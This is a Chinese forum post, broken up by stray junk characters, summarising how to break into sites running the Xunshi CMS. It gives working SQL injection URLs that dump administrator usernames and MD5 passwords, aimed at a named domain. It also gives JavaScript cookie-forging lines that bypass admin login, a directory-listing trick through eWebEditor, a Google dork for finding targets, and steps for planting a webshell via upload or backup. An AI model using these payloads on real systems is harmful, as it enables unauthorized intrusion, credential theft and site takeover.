讯时漏洞总结

admin

by:血封忆尘
: ]5 ]5 h1 ]5 W5 Z% c" S. |
! U  S9 U% i- z% j在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）

8 ]& V5 A! y* `& J以下本文总结来自黑防去年第9期杂志上的内容...

先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%

+ P5 N5 g' Q: W26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2
2 B; F+ ^) \0 |" Y3 g, A
记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
这里一个注入
+ @: e2 w  m0 B1 L8 n' r2 k/ ?
效果如图:
5 M7 Z8 i& o; r: Z6 k, f
. y1 Q- G8 v0 |3 ^! T  |" x
' D: O& v: b7 \' q
4 L0 Y. U+ C% [. l2 r1 {# C$ m这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.

1 s1 d9 `5 V' i/ h/ g' N- F密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去

, L7 h& J6 Z( `javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
3 P" z8 A) y+ S, c
* i& w( x: Z' n1 }% _* v那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:

, W3 N1 K/ k) {$ T因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞
0 N$ u# m) G- P
它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以

访问这页面来列目录..步骤如下:

javascript:alert(document.cookie="admindj=1")

& d' P% Q- a; G- Mhttp://www.political-security.co ... asp?id=46&dir=../..

" ?0 M' j" \  @* A& A) I' |效果如图:
  d% ]; _( s" h, d/ }


7 M: @# C4 c, {! J2 N; I: P$ I这样全站目录都能瞧了..找到后台目录..进去..

那么进了后台怎么拿shell？？上传--备份就ok了..
8 Z! h. u+ t$ f2 |+ R7 E
' @! I. t/ Y/ [9 L: C9 H' `那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..
/ t7 ^6 I! X. ]. d1 D5 k3 Y
这个我也碰到过一次..你都可以通过列目录来实现..

9 q( P/ }  R3 v( mjavascript:alert(document.cookie="admindj=1")

2 D' ?+ M* Q2 p; j2 j4 Rhttp://www.political-security.co ... p?action=BackupData

备份ok..
7 o/ Z* T7 V1 B6 f
, A% X; ^( t* e7 Z那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
! ]/ P& U, P( A% i0 h
% \1 y5 R" ^" }+ k6 e* ?% ^在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下
4 r3 G+ a3 b- u$ g
然后访问此页面进行注入..步骤如下:
  c" i7 _; i$ N# |) H
; B2 N7 Z4 K6 w( M3 ~javascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")
/ n" [7 q, `- M( A' z
然后请求admin/admin_chk.asp页面
  D$ g% O, V& E+ V  L( ?/ j
4 C% Q' D; d. V3 e8 p, P4 p输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%

( |: l  l1 Z" a" W26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin

" B  R. \! [0 O* z0 l效果如图所示:


# m, R4 q$ {# j  P4 j8 P" a( P$ K
讯时漏洞2
6 l! l. L$ @" O& L7 d* Y6 a, @* s4 Qgoogle关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）
6 m5 f4 {9 P" \1 d' ]
1、/admin/admin_news_pl_view.asp?id=1
3 C+ D3 ~# D7 Z+ ~//id任意 填入以下语句
  b# g5 L' H. `) O: ?( X
4 g6 L5 ?7 l0 t( X4 D$ p2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！
( {* h. H! l; o


- z6 Q" a4 p3 w$ {. W; E3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='


! k$ Q& l: W; O1 Y' ?6 K7 q3 k0 h
爆出管理员帐号和密码了

  Y6 ^2 B. {; F- R& S9 q

+ r; v3 ^+ e0 a9 W4、cookies进后台

/ B' }3 i2 e/ S# l" V! Sjavascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));



6 e! y- `$ t1 ~, f* V5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！
" K5 v, z$ {1 S9 ^% a# n% k
* x3 I. M  H$ a! a' u6 O. q2 s
" Y  {% h/ E0 Y6 I7 D
6、后台有上传和备份取SHELL不难。
2 `' r- e. k# j$ J1 O0 U
  q" H0 m& y- t& v6 [8 i7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..
" U+ u  h* @' |
+ y& ]2 A  u6 N3 h- a+ K逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！

- F( }, B9 `7 Z' Q% z

7 J, D3 P" ^, f+ s6 U8 C! V5 `5 E